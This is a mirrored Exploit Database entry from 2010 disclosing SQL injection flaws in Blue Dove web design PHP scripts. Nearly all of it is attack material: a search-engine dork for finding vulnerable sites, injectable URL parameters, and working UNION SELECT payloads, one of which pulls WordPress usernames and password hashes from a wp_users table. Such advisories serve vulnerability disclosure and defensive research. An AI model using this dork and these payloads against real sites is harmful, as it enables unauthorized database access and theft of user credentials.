Blue Dove – SQL Injection

• Exploit Database
• 9 阅读

• 作者： HackXBack
  日期： 2010-02-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11360/

• ####################################################################
  .:. Author : HackXBack [h-b@usa.com]
  .:. Team : Sec Attack Team
  .:. Home : www.sec-attack.com/vb
  .:. Script : Blue Dove Word Press Development
  
  .:. Bug Type : Sql Injection
  .:. Dork : "powered by Blue Dove Web Design"
  
  ####################################################################
  
  ===[ Exploit ]===
  
  http://server/path/file.php?id=null[SQL]
  
  http://server/newsletter/newsletter.php?Id=null[SQL]
  
  
  ===[ Example ]===
  
  http://server/sections/newsletter.php?Id=-30%20union%20select%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14
  
  http://server/newsletter/newsletter_new.php?Id=107+and+1=2+UNION%20SELECT%201,2,3,4,5,concat%28user_login,0x3a,user_pass%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50+from+jam_jam2.wp_users
  
  http://server/newsletter/newsletter.php?Id=-null+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,@@version,29,30,31,32,33,34,35,36,37,38,39,40
  
  
  
  
  
  ####################################################################
  
  Greats T0: AtT4CKxT3rR0r1ST & All Member Sec Attack